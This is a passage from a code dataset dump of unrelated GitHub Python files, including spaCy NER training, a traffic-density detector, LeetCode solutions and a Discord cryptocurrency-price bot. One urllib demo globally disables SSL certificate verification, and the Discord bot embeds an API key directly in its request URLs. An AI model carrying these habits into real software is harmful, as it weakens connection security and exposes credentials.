u\"Unfortunately, the food is outstanding, but everything else about this restaurant is the pits.\" ,{'entities':[(27,38, u'TASTE' )]}),\n\n( u\"We always have a delicious meal and always leave feeling satisfied.\" ,{'entities':[(17,26, u'TASTE' )]}),\n\n( u\"The pizza was pretty good and huge.\" ,{'entities':[(14,25, u'TASTE' )]}),\n\n( u\"The atmosphere is unheralded, the service impecible, and the food magnificent.\" ,{'entities':[(66,77, u'TASTE' )]}),\n\n( u\"The wait staff is friendly, and the food has gotten better and better!\" ,{'entities':[(52,58, u'TASTE' )]}),\n\n( u\"It may be a bit packed on weekends, but the vibe is good and it is the best French food you will find in the area.\" ,{'entities':[(71,75, u'TASTE' )]}),\n\n( u\"Right off the L in Brooklyn this is a nice cozy place with good pizza.\" ,{'entities':[(59,63, u'TASTE' )]}),\n\n( u\"We had the lobster sandwich and it was FANTASTIC.\" ,{'entities':[(39,48, u'TASTE' )]}),\n\n( u\"Deep Fried Skewers are good and still rare to find in NYC.\" ,{'entities':[(23,27, u'TASTE' )]}),\n\n( u\"Their tuna tartar appetizer is to die for.\" ,{'entities':[(34,41, u'TASTE' )]}),\n\n( u\"An oasis of refinement: Food, though somewhat uneven, often reaches the pinnacles of new American fine cuisine - chef's passion (and kitchen's precise execution) is most evident in the fish dishes and soups.\" ,{'entities':[(47,53, u'TASTE' )]}),\n\n]\n\n\n@plac.annotations(\n model=(\"Model name. Defaults to blank 'en' model.\", \"option\", \"m\", str),\n new_model_name=(\"New model name for model meta.\", \"option\", \"nm\", str),\n output_dir=(\"Optional output directory\", \"option\", \"o\", Path),\n n_iter=(\"Number of training iterations\", \"option\", \"n\", int))\ndef main(model=None, new_model_name='animal', output_dir=None, n_iter=20):\n \"\"\"Set up the pipeline and entity recognizer, and train the new entity.\"\"\"\n nlp = spacy.load('en') # create blank Language class\n print(\"Created blank 'en' model\")\n # Add entity recognizer to model if it's not in the pipeline\n # nlp.create_pipe works for built-ins that are registered with spaCy\n if 'ner' not in nlp.pipe_names:\n ner = nlp.create_pipe('ner')\n nlp.add_pipe(ner)\n # otherwise, get it, so we can add labels to it\n else:\n ner = nlp.get_pipe('ner')\n\n ner.add_label(LABEL) # add new entity label to entity recognizer\n if model is None:\n optimizer = nlp.begin_training()\n else:\n # Note that 'begin_training' initializes the models, so it'll zero out\n # existing entity types.\n optimizer = nlp.entity.create_optimizer()\n\n\n\n # get names of other pipes to disable them during training\n other_pipes = [pipe for pipe in nlp.pipe_names if pipe != 'ner']\n with nlp.disable_pipes(*other_pipes): # only train NER\n for itn in range(n_iter):\n random.shuffle(TRAIN_DATA)\n losses = {}\n for text, annotations in TRAIN_DATA:\n nlp.update([text], [annotations], sgd=optimizer, drop=0.35,\n losses=losses)\n print(losses)\n\n # test the trained model\n test_text = 'The food always tastes fresh and served promptly.'\n doc = nlp(test_text)\n print(\"Entities in '%s'\" % test_text)\n for ent in doc.ents:\n print(ent.label_, ent.text)\n\n # save model to output directory\n if output_dir is None:\n output_dir = Path('/home/tanush/Desktop/NER Project/Taste Extractor/en_rev_taste')\n if not output_dir.exists():\n output_dir.mkdir()\n nlp.meta['name'] = new_model_name # rename model\n nlp.to_disk(output_dir)\n print(\"Saved model to\", output_dir)\n\n # test the saved model\n print(\"Loading from\", output_dir)\n nlp2 = spacy.load(output_dir)\n doc2 = nlp2(test_text)\n for ent in doc2.ents:\n print(ent.label_, ent.text)\n\n\nif __name__ == '__main__':\n plac.call(main)\n","repo_name":"aijedi/taste_extract","sub_path":"train_new_entity_type.py","file_name":"train_new_entity_type.py","file_ext":"py","file_size_in_byte":8914,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"169786053","text":"import numpy as np\nimport pickle\nimport csv\nimport itertools\nimport nltk\n\n\n\ndef preprocess(vocabulary_size, use_existing, unknown_token, sentence_start_token, sentence_end_token):\n if use_existing:\n with open('training_data.pickle', 'rU') as f:\n X_train, Y_train, index_to_word, word_to_index = pickle.load(f)\n else:\n unknown_token = \"UNKNOWN_TOKEN\"\n sentence_start_token = \"SENTENCE_START\"\n sentence_end_token = \"SENTENCE_END\"\n\n\n #Reading CSV file in\n print(\"Reading CSV file\")\n\n with open('data/reddit_text.csv', 'rb') as f:\n reader = csv.reader(f, skipinitialspace=True)\n reader.next()\n #split full comments into sentences\n sentences = itertools.chain(*[nltk.sent_tokenize(x[0].decode('utf-8').lower()) for x in reader])\n #appent SENTENCE_START and SENTENCE_END\n sentences = [\"%s %s %s\" % (sentence_start_token, x, sentence_end_token) for x in sentences]\n print(\"Parsed %d sentences\" % (len(sentences)))\n\n #Tokenize Sentences into words\n tokenized_sentences = [nltk.word_tokenize(sentence) for sentence in sentences]\n\n #Count the word frequences\n word_freq = nltk.FreqDist(itertools.chain(*tokenized_sentences))\n print(\"Found %d unique word tokens.\" % len(word_freq.items()))\n\n #Build both index_to_word and word_to_index vectors for the most common words\n vocab = word_freq.most_common(vocabulary_size-1)\n index_to_word = [x[0] for x in vocab]\n index_to_word.append(unknown_token)\n word_to_index = dict([(w, i) for i, w in enumerate(index_to_word)])\n\n print(\"Using vocabulary of size %d\" % vocabulary_size)\n print(\"The least frequent word in our vocabulary is '%s' and appeared %d times.\" % (vocab[-1][0], vocab[-1][1]))\n\n #Replace all words not in out vocabulary with unknown_token\n for i, sentence in enumerate(tokenized_sentences):\n tokenized_sentences[i] = [w if w in word_to_index else unknown_token for w in sentence]\n\n print(\"\\nExample sentence before preprocessing: '%s'\" % sentences[0])\n print(\"\\nExample sentence after preprocessing: '%s'\" % tokenized_sentences[0])\n\n #Create training data\n X_train = np.asarray([[word_to_index[w] for w in sentence[:-1]] for sentence in tokenized_sentences])\n Y_train = np.asarray([[word_to_index[w] for w in sentence[1:]] for sentence in tokenized_sentences]) \n with open('training_data.pickle', 'w') as f:\n pickle.dump([X_train, Y_train, index_to_word, word_to_index], f)\n\n return X_train, Y_train, index_to_word, word_to_index\n\n\n\n\ndef softmax(x):\n xt = np.exp(x - np.max(x))\n return xt / np.sum(xt)\n\n\n\n\n","repo_name":"kenk42292/RNN","sub_path":"data/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18992084580","text":"import cv2\nimport numpy as np\nimport matplotlib.path as mplPath\nimport glob\nimport os\nimport time\n\nfrom detection import Detector\n\nclass Intensity_Road:\n def __init__(self) -> None:\n self.DC = Detector()\n self.frame=0\n self.a1 = [[330,362],[424,219],[440,161],[466,157],[472,233],[418,370]] ####Coordinates provided by images\n self.a2 = [[3,751],[324,371],[414,375],[86,958]]\n self.b1 = [[479,382],[482,151],[513,153],[548,294],[553,294],[552,388]]\n self.b2 = [[300,965],[478,385],[554,387],[530,950]]\n self.c1 = [[597,384],[558,222],[524,148],[554,148],[645,290],[685,384]]\n self.c2 = [[630,953],[594,388],[684,387],[883,951]]\n self.d1 = [[746,375],[637,220],[569,153],[592,156],[697,242],[816,376]]\n self.d2 = [[1060,955],[749,380],[819,378],[1272,903],[1278,950]]\n\n self.a1_path = mplPath.Path(np.array(self.a1))\n self.b1_path = mplPath.Path(np.array(self.b1))\n self.c1_path = mplPath.Path(np.array(self.c1))\n self.d1_path = mplPath.Path(np.array(self.d1))\n self.a2_path = mplPath.Path(np.array(self.a2))\n self.b2_path = mplPath.Path(np.array(self.b2))\n self.c2_path = mplPath.Path(np.array(self.c2))\n self.d2_path = mplPath.Path(np.array(self.d2))\n\n self.a1cnt=0\n self.b1cnt=0\n self.c1cnt=0\n self.d2cnt=0\n self.a2cnt=0\n self.b2cnt=0\n self.c2cnt=0\n self.d2cnt=0\n\n self.colors =[(0,255,0),(255, 0, 0),(0,0,255)]\n\n def gui(self):\n for fname in sorted(glob.glob(\"enter_image_dir/*.jpg\"), key=os.path.getmtime): \n time.sleep(0.01)\n image_rgb = cv2.imread(fname)\n image_rgb=cv2.resize(image_rgb,(1280,960),interpolation=cv2.INTER_AREA)\n self.h, self.w,_= image_rgb.shape\n detected_img, self.detections, self.blackimg = self.DC.main_intensity(image_rgb)\n\n if self.frame%30==0:\n intensity_level=self.intensity()\n\n mask=self.mask_img(detected_img, intensity_level)\n \n mask=cv2.resize(mask,(2592,1520),interpolation=cv2.INTER_AREA)\n mask = cv2.rectangle(mask, (1200,60), (1730, 0), (255,255,255), -1)\n cv2.putText(mask, 'Traffic Density', (1200,50), cv2.FONT_HERSHEY_SIMPLEX, 2, (0,0,0), 2, cv2.LINE_AA)\n cv2.imshow(\"Inference\", mask)\n if cv2.waitKey(10) & 0xFF == ord(\"q\"):\n break\n self.frame+=1\n\n def mask_img(self, image, intensity_level):\n h, w, d = image.shape\n mask = np.zeros([h,w],dtype=np.uint8)\n\n a1 = np.array(self.a1, np.int32)\n b1 = np.array(self.b1, np.int32)\n c1 = np.array(self.c1, np.int32)\n d1 = np.array(self.d1, np.int32)\n a2 = np.array(self.a2, np.int32)\n b2 = np.array(self.b2, np.int32)\n c2 = np.array(self.c2, np.int32)\n d2 = np.array(self.d2, np.int32)\n\n mask = np.dstack((mask, mask, mask))\n\n cv2.fillPoly(mask, [a1], self.colors[int(intensity_level[0])])\n cv2.fillPoly(mask, [b1], self.colors[int(intensity_level[1])])\n cv2.fillPoly(mask, [c1], self.colors[int(intensity_level[2])])\n cv2.fillPoly(mask, [d1], self.colors[int(intensity_level[3])])\n cv2.fillPoly(mask, [a2], self.colors[int(intensity_level[4])])\n cv2.fillPoly(mask, [b2], self.colors[int(intensity_level[5])])\n cv2.fillPoly(mask, [c2], self.colors[int(intensity_level[6])])\n cv2.fillPoly(mask, [d2], self.colors[int(intensity_level[7])])\n\n mask2 = cv2.bitwise_or(image, mask)\n # mask = cv2.bitwise_or(self.blackimg, mask)\n # mask = self.transform(mask)\n # #mask[0:100,0:1280]=0\n # cv2.imshow(\"maske\", mask)\n # cv2.waitKey(10)\n return mask2\n \n def count_vehicle(self):\n intensity_list=[]\n self.a1cnt=0\n self.b1cnt=0\n self.c1cnt=0\n self.d1cnt=0\n self.a2cnt=0\n self.b2cnt=0\n self.c2cnt=0\n self.d2cnt=0\n for i,pred in enumerate(self.detections):\n x,y = self.bbox(pred)\n point=(int(x),int(y))\n\n if self.a1_path.contains_point(point):\n self.a1cnt+=1\n elif self.b1_path.contains_point(point):\n self.b1cnt+=1\n elif self.c1_path.contains_point(point):\n self.c1cnt+=1\n elif self.d1_path.contains_point(point):\n self.d1cnt+=1\n elif self.a2_path.contains_point(point):\n self.a2cnt+=1\n elif self.b2_path.contains_point(point):\n self.b2cnt+=1\n elif self.c2_path.contains_point(point):\n self.c2cnt+=1\n elif self.d2_path.contains_point(point):\n self.d2cnt+=1\n else:\n pass\n #print(\"No vehicle detected on the roads\")\n\n intensity_list= [self.a1cnt, self.b1cnt, self.c1cnt, self.d1cnt, self.a2cnt, self.b2cnt, self.c2cnt, self.d2cnt]\n return intensity_list\n\n def intensity(self):\n intensity_level=[]\n intensity_list = self.count_vehicle()\n #print(intensity_list)\n for i,ints in enumerate(intensity_list):\n if ints<=2:\n intensity_level = np.append(intensity_level, 0)\n elif 2 List[List[int]]:\n self.ans = []\n path = []\n self.dfs(sorted(nums), path)\n\n return self.ans\n\n def dfs(self, nums: List[int], path: List[int]):\n if not nums:\n self.ans.append(path)\n\n for i in range(len(nums)):\n if i != 0 and nums[i - 1] == nums[i]:\n continue\n self.dfs(nums[:i] + nums[i + 1 :], path + [nums[i]])\n","repo_name":"jerrt2003/leetcode-in-python","sub_path":"47_Permutations_II/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18913205778","text":"from datetime import datetime\n\nfrom ..database.queryDB import QueryDB\nfrom ..database.regiontableDB import RegionTableDB\nfrom ..database.winetableDB import WineTableDB\nfrom .datastructures import Region, Review, Vintage, Websites, Wine\n\nregion1 = Region(\n \"St Julien\",\n \"Bordeaux - Left Bank\",\n \"France\",\n)\n\nregion2 = Region(\n \"Pauillac\",\n \"Bordeaux - Left Bank\",\n \"France\",\n)\n\n# TODO Link region table to wine table and do a fetch\n\nregiontable = RegionTableDB()\nregiontable.insert(region1)\nregiontable.insert(region2)\n\nregiontable.print_all_rows()\n\nregiontable.amend_subregion_spelling(\"Pauillac\", \"Pauylac\")\nregiontable.print_all_rows()\n\nwine1 = Wine(\n \"Château Grand-Puy-Lacoste\",\n \"Red\",\n \"France\",\n \"Bordeaux - Left Bank\",\n \"Pauillac\",\n \"Cabernet Sauvignon & Merlot\",\n)\n\nwine2 = Wine(\n \"Château Gloria\",\n \"Red\",\n \"France\",\n \"Bordeaux\",\n \"Paulliac\",\n \"Cab Sav\",\n)\nwine3 = Wine(\n \"Château Margaux\",\n \"White\",\n \"France\",\n \"Bordeaux\",\n \"St Julien\",\n \"Cab Sav\",\n)\n\nwine4 = Wine(\n \"Château Grand-Puy-Lacoste\",\n \"Orange\",\n \"France\",\n \"Bordeaux - Left Bank\",\n \"Pauillac\",\n \"Cabernet Sauvignon & Merlot\",\n)\n\nwinetable = WineTableDB()\nwinetable.insert(wine1)\nwinetable.insert(wine2)\nwinetable.insert(wine3)\nwinetable.insert(wine4)\n\nquery = QueryDB()\n\nwines = query.fetch_by_colour(\"Red\")\nprint(\"Fetch reds\")\nfor wine in wines:\n print(wine)\nprint(\"*\" * 15)\n\nwinetable.update_colour(1, \"Blue\")\n\nwines = query.fetch_by_colour(\"Blue\")\nprint(\"Colour change\")\nfor wine in wines:\n print(wine)\nprint(\"*\" * 15)\n\nwines = query.fetch_by_country_and_name_and_reverse_colour_order(\"France\")\nprint(\n \"Name and reverse colour order\"\n) # No need for sort index in transactions application?\nfor wine in wines:\n print(wine)\nprint(\"*\" * 15)\n\nprint(\"Print all rows\")\nwinetable.print_all_rows()\nprint(\"*\" * 15)\n\nwinetable.delete(1)\n# Best to use rowid if you are deleting or updating a record - this is its unique identifier - no need to wineID etc\nprint(\"Deleted record 1 - reprint all rows\")\nwinetable.print_all_rows()\nprint(\"*\" * 15)\n\nwines = query.fetch_by_colour(\"White\")\nprint(\"Fetch whites\")\nfor wine in wines:\n print(wine)\nprint(\"*\" * 15)\n\n\nvintage1 = Vintage(\n \"ID00001\",\n 2018,\n \"BBR\",\n \"BBR\",\n \"In Bond\",\n 75,\n 6,\n 2,\n 279.96,\n \"ID00001.01\",\n 0,\n \"Post-release\",\n datetime(2023, 1, 4, 0, 0),\n datetime(2023, 1, 4, 0, 0),\n)\n\nreview1 = Review(\n \"ID00001\",\n \"\"\"The 2018 Grand-Puy-Lacoste is fabulous, just as it was from barrel. Strong \\\nCabernet inflections soar out of the glass, giving the wine a compelling \\\naromatic profile laced with the essence of graphite, dried herbs, menthol \\\nand dark fruit. One of the most classic (for lack of a better word) wines \\\nin the Left Bank in 2018, Grand-Puy-Lacoste is super-impressive right out \\\nof the gate. Grand-Puy-Lacoste is ultimately a wine of tremendous class \\\nthat remains restrained and aristocratic in breeding. Don't miss it.\n \"\"\",\n \"96\",\n \"Antonio Galloni\",\n \"2028 - 2048\",\n \"1st March 2021\",\n)\n\n\nweb1 = Websites(\n \"ID00001\",\n \"cellartracker\",\n \"winesearcher\",\n)\n","repo_name":"ClangerBite/Wines","sub_path":"Wines/src/core/loaddata.py","file_name":"loaddata.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73676379049","text":"from urllib.request import Request,urlopen\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\n# python3中请求https时会默认开启ssh验证,所以需要关闭\nheaders = {\n 'User-Agent':'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25'\n}\n\nreq = Request('http://www.douban.com/',headers=headers)\n\nres = urlopen(req)\nprint(res.read().decode('utf-8'))","repo_name":"wangquan1024/webSpider","sub_path":"urilib/demo3.py","file_name":"demo3.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32113248217","text":"class PrefixMiddleware:\n \"\"\"Create global prefix middleware\"\"\"\n\n # NOTE test note here\n def __init__(self, app, prefix=\"\"):\n self.app = app\n self.prefix = prefix\n\n def __call__(self, environ, start_response):\n if environ[\"PATH_INFO\"].startswith(self.prefix):\n environ[\"PATH_INFO\"] = environ[\"PATH_INFO\"][len(self.prefix) :]\n environ[\"SCRIPT_NAME\"] = self.prefix\n return self.app(environ, start_response)\n else:\n start_response(\"200\", [(\"Content-Type\", \"application/json\")])\n return [\n \"\"\"{msg: please prefix all routes with /api \n to correctly route requests}\"\"\".encode()\n ]\n","repo_name":"anish-sinha1/jen","sub_path":"server/app/middleware/prefix.py","file_name":"prefix.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"6207170897","text":"# LeetCode 32\n# Longest Valid Parentheses\n# Dynamic Programming\n\nfrom typing import List\n\nclass Solution:\n def longestValidParentheses(self, s: str) -> int:\n if len(s) < 2:\n return 0\n dp = [0] * len(s)\n dp[0], dp[1] = 0, 2 if s[0:2] == \"()\" else 0\n for i in range(2, len(s)):\n if s[i] == \"(\": # ...(\n dp[i] = 0\n elif s[i - 1] == \"(\": # ...()\n dp[i] = dp[i - 2] + 2\n elif i - dp[i - 1] - 1 >= 0 and s[i - dp[i - 1] - 1] == \"(\": # ..((...))\n dp[i] = dp[i - 1] + 2\n if i - dp[i - 1] - 2 >= 0:\n dp[i] = dp[i] + dp[i - dp[i - 1] - 2]\n return max(dp)\n\nif __name__ == \"__main__\":\n print(Solution().longestValidParentheses(\"(()\"))\n print(Solution().longestValidParentheses(\")()())\"))\n print(Solution().longestValidParentheses(\"\"))\n print(Solution().longestValidParentheses(\"(()))()\"))","repo_name":"David-Xiang/Online-Judge-Solutions","sub_path":"210722/LC32.py","file_name":"LC32.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34955827669","text":"import numpy as np\nimport torch\nimport os\nimport random\nimport argparse\nfrom tqdm import tqdm\nfrom sklearn.metrics import classification_report\n\nfrom data.dataset import ShapeDataset\nfrom models.transformer_base import PCTransformer\n\n\ndef run_model(model, dataloader, device):\n model.eval()\n y_true = []\n y_pred = []\n with torch.no_grad():\n for i, data in tqdm(enumerate(dataloader)):\n pc, y = data[0].to(device), data[1].to(device)\n logits = model(pc)\n y_true += y.data.cpu().numpy().tolist()\n y_pred += torch.argmax(logits, dim=1).data.cpu().numpy().tolist()\n print('Classification report for {} set'.format(dataloader.dataset.phase))\n target_names = list(dataloader.dataset.class_map.keys())\n print(classification_report(y_true, y_pred, target_names=target_names))\n\n\ndef test(args):\n device = torch.device('cuda' if torch.cuda.is_available else 'cpu')\n dataset_t = ShapeDataset('test', args)\n dataloader_t = torch.utils.data.DataLoader(dataset_t,\n batch_size=args.batch_size,\n shuffle=False,\n num_workers=args.num_workers,\n drop_last=False,\n pin_memory=torch.cuda.is_available()\n )\n dataset_v = ShapeDataset('valid', args)\n dataloader_v = torch.utils.data.DataLoader(dataset_v,\n batch_size=args.batch_size,\n shuffle=False,\n num_workers=args.num_workers,\n drop_last=False,\n pin_memory=torch.cuda.is_available()\n )\n\n model = PCTransformer(args)\n checkpoint = torch.load(args.weights_path, map_location='cpu')\n model.load_state_dict(checkpoint['model_state_dict'])\n model.to(device)\n run_model(model, dataloader_t, device)\n run_model(model, dataloader_v, device)\n\n\nif __name__ == \"__main__\":\n args = argparse.Namespace(\n seed=111,\n num_workers=4,\n data_path='./dataset-v2',\n weights_path='./last.pt',\n num_cls=6,\n n_points_mesh=25000,\n n_points_batch=1024,\n batch_size=110,\n hid_dim=128,\n nhead=2,\n dropout=0.4,\n dim_fc=1024,\n n_attn=4,\n )\n seed_value = args.seed\n os.environ['PYTHONHASHSEED'] = str(seed_value)\n torch.manual_seed(seed_value)\n torch.cuda.manual_seed_all(seed_value)\n random.seed(seed_value)\n np.random.seed(seed_value)\n\n test(args)\n","repo_name":"maxs-kan/phygitalism_tasks","sub_path":"task3/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29536456824","text":"from django.conf.urls import url\n\nfrom . import auth, views\n\napp_name = 'main'\nurlpatterns = [\n url(r'^register/$', auth.RegisterFormView.as_view()),\n url(r'^login/$', auth.LoginFormView.as_view()),\n url(r'^logout/$', auth.LogoutView.as_view()),\n url(r'^$', views.index, name=\"index\"),\n url(r'^record/new$', views.record_new, name=\"record_new\"),\n url(r'^record/(?P[0-9]+)$', views.one_record, name='one_record'),\n url(r'^user/(?P[0-9]+)$', views.user_records, name='user_records'),\n]\n","repo_name":"alekseyivashin/django_blog","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1206299501","text":"import discord\nimport json\nimport urllib.request\nimport config as cfg \t\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n\tprint('We have logged in as {0.user}'.format(client))\n@client.event\nasync def on_message(message):\n\tif message.author == client.user:\n\t\treturn\n\n\tif message.content.startswith('crypto'):\n\t\tif message.content == \"crypto help\":\n\t\t\tembed = discord.Embed(title=\"Help\",description=\"some useful commands\")\n\t\t\tembed.add_field(name=\"crypto btc\", value=\"Returns The Price of Bitcoin.\")\n\t\t\tembed.add_field(name=\"crypto eth\", value=\"Returns The Price of Ethereum\")\n\t\t\tembed.add_field(name=\"crypto xrp\", value=\"Returns The Price of Ripple\")\n\t\t\tembed.add_field(name=\"crypto xlm\", value=\"Returns The Price of Stellar\")\n\t\t\tembed.add_field(name=\"crypto xmr\", value=\"Returns The Price of Monero\")\n\t\t\tembed.add_field(name=\"crypto rep\", value=\"Returns The Price of Augur\")\n\t\t\tembed.add_field(name=\"crypto dash\", value=\"Returns The Price of Dash\")\n\t\t\tembed.add_field(name=\"crypto top10 volume\", value=\"Returns The Top 10 Cryptocurrencies(Volume)\")\n\t\t\tawait message.channel.send(content=None, embed=embed)\n\t\telif message.content == \"crypto btc\":\n\t\t\turl = \"https://api.nomics.com/v1/currencies/ticker?key=09a28f4136aef7b18df8880d88838464&ids=BTC&interval=1d,30d&convert=USD\"\n\t\t\tdata = json.loads(urllib.request.urlopen(url).read())\n\t\t\t\n\t\t\tawait message.channel.send('Rank: ' + data[0]['rank']+ '\\nName: ' + data[0]['name'] + '\\nSymbol: ' + data[0]['symbol'] +'\\nPrice: ' +data[0]['price'] + ' Dollars')\n\t\telif message.content == \"crypto eth\":\n\t\t\turl = \"https://api.nomics.com/v1/currencies/ticker?key=09a28f4136aef7b18df8880d88838464&ids=ETH&interval=1d,30d&convert=USD\"\n\t\t\tdata = json.loads(urllib.request.urlopen(url).read())\n\t\t\t\n\t\t\tawait message.channel.send('Rank: ' + data[0]['rank']+ '\\nName: ' + data[0]['name'] + '\\nSymbol: ' + data[0]['symbol'] +'\\nPrice: ' +data[0]['price'] + ' Dollars')\n\t\telif message.content == \"crypto xrp\":\n\t\t\turl = \"https://api.nomics.com/v1/currencies/ticker?key=09a28f4136aef7b18df8880d88838464&ids=XRP&interval=1d,30d&convert=USD\"\n\t\t\tdata = json.loads(urllib.request.urlopen(url).read())\n\t\t\t\n\t\t\tawait message.channel.send('Rank: ' + data[0]['rank']+ '\\nName: ' + data[0]['name'] + '\\nSymbol: ' + data[0]['symbol'] +'\\nPrice: ' +data[0]['price'] + ' Dollars')\n\t\telif message.content == \"crypto xlm\":\n\t\t\turl = \"https://api.nomics.com/v1/currencies/ticker?key=09a28f4136aef7b18df8880d88838464&ids=XLM&interval=1d,30d&convert=USD\"\n\t\t\tdata = json.loads(urllib.request.urlopen(url).read())\n\t\t\t\n\t\t\tawait message.channel.send('Rank: ' + data[0]['rank']+ '\\nName: ' + data[0]['name'] + '\\nSymbol: ' + data[0]['symbol'] +'\\nPrice: ' +data[0]['price'] + ' Dollars')\n\t\telif message.content == \"crypto xmr\":\n\t\t\turl = \"https://api.nomics.com/v1/currencies/ticker?key=09a28f4136aef7b18df8880d88838464&ids=XMR&interval=1d,30d&convert=USD\"\n\t\t\tdata = json.loads(urllib.request.urlopen(url).read())\n\t\t\t\n\t\t\tawait message.channel.send('Rank: ' + data[0]['rank']+ '\\nName: ' + data[0]['name'] + '\\nSymbol: ' + data[0]['symbol'] +'\\nPrice: ' +data[0]['price'] + ' Dollars')\n\t\telif message.content == \"crypto rep\":\n\t\t\turl = \"https://api.nomics.com/v1/currencies/ticker?key=09a28f4136aef7b18df8880d88838464&ids=REP&interval=1d,30d&convert=USD\"\n\t\t\tdata = json.loads(urllib.request.urlopen(url).read())\n\t\t\t\n\t\t\tawait message.channel.send('Rank: ' + data[0]['rank']+ '\\nName: ' + data[0]['name'] + '\\nSymbol: ' + data[0]['symbol'] +'\\nPrice: ' +data[0]['price'] + ' Dollars')\n\t\telif message.content == \"crypto dash\":\n\t\t\turl = \"https://api.nomics.com/v1/currencies/ticker?key=09a28f4136aef7b18df8880d88838464&ids=DASH&interval=1d,30d&convert=USD\"\n\t\t\tdata = json.loads(urllib.request.urlopen(url).read())\n\t\t\t\n\t\t\tawait message.channel.send('Rank: ' + data[0]['rank']+ '\\nName: ' + data[0]['name'] + '\\nSymbol: ' + data[0]['symbol'] +'\\nPrice: ' +data[0]['price'] + ' Dollars')\n\t\telif message.content == \"crypto top10 volume\":\n\t\t\tawait message.channel.send('Please wait for Computation to occur!')\n\t\t\turl = \"https://api.nomics.com/v1/currencies/ticker?key=09a28f4136aef7b18df8880d88838464\"\n\t\t\tdata=json.loads(urllib.request.urlopen(url).read())\n\t\t\ttop_10_names = [x[\"name\"] for x in data[:10]]\n\t\t\ttop_10_price = [x[\"price\"] for x in data[:10]]\n\t\t\tembed = discord.Embed(title=\"Ranking of Cryptocurrencies(Volume)\",description=\"\")\n\t\t\tembed.add_field(name=\"1.\", value=top_10_names[0]+\"\\nValue: \"+top_10_price[0]+\"$\")\n\t\t\tembed.add_field(name=\"2.\", value=top_10_names[1]+\"\\nValue: \"+top_10_price[1]+\"$\")\n\t\t\tembed.add_field(name=\"3.\", value=top_10_names[2]+\"\\nValue: \"+top_10_price[2]+\"$\")\n\t\t\tembed.add_field(name=\"4.\", value=top_10_names[3]+\"\\nValue: \"+top_10_price[3]+\"$\")\n\t\t\tembed.add_field(name=\"5.\", value=top_10_names[4]+\"\\nValue: \"+top_10_price[4]+\"$\")\n\t\t\tembed.add_field(name=\"6.\", value=top_10_names[5]+\"\\nValue: \"+top_10_price[5]+\"$\")\n\t\t\tembed.add_field(name=\"7.\", value=top_10_names[6]+\"\\nValue: \"+top_10_price[6]+\"$\")\n\t\t\tembed.add_field(name=\"8.\", value=top_10_names[7]+\"\\nValue: \"+top_10_price[7]+\"$\")\n\t\t\tembed.add_field(name=\"9.\", value=top_10_names[8]+\"\\nValue: \"+top_10_price[8]+\"$\")\n\t\t\tembed.add_field(name=\"10.\", value=top_10_names[9]+\"\\nValue: \"+top_10_price[9]+\"$\")\n\t\t\tawait message.channel.send(content=None, embed=embed)\n\n\t\telse:\n\t\t\tawait message.channel.send('Unknown Command,\\nPlease refer to \"crypto help\" for more information!')\t\n\nclient.run(cfg.myToken[\"token\"])","repo_name":"rymnc/crypto-discord-bot","sub_path":"script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":5400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21946689119","text":"import math\nfrom dataclasses import dataclass, asdict\nfrom datetime import datetime\nfrom typing import Optional\n\nimport pytz\nfrom bson import ObjectId\n\nfrom src.auxiliary import db\nfrom src.auxiliary.stopwatch import Stopwatch\n\n\n@dataclass\nclass SubmittedForm:\n chat_id: int\n person_type: str\n name: str\n age: int\n contact_means: str\n contact: str\n\n consultation_preference: Optional[str] = None\n _id: Optional[ObjectId] = None\n\n submission_time: str = datetime.now(tz=pytz.UTC).isoformat()\n\n\ndef save_submission(submission: SubmittedForm):\n with Stopwatch('save_submission'):\n with db.get_db_client() as client:\n client[db.DB_NAME][db.SUBMITTED_FORM_DATA_NAME].insert_one(asdict(submission))\n\n\ndef get_all_submitted_forms():\n with db.get_db_client() as client:\n items = client[db.DB_NAME][db.SUBMITTED_FORM_DATA_NAME].find({})\n\n for item in items:\n for k, v in item.items():\n if type(item[k]) == float and math.isnan(item[k]):\n item[k] = ''\n\n yield {\n 'id': str(item['_id']),\n 'person_type': str(item['person_type']),\n 'name': str(item['name']),\n 'age': int(item['age']),\n 'contact_means': str(item['contact_means']),\n 'contact': str(item['contact']),\n 'consultation_preference': str(item['consultation_preference']),\n 'submission_time': str(item['submission_time'])\n }\n\n\ndef any_key(some_dict: dict):\n if some_dict is None:\n return None\n\n return list(some_dict.values())[0]\n","repo_name":"TermanEmil/psychologist_finder_bot","sub_path":"src/SubmittedForm.py","file_name":"SubmittedForm.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26180665797","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom absl import app\nfrom absl import flags\nimport time\nimport os\n\nimport tensorflow as 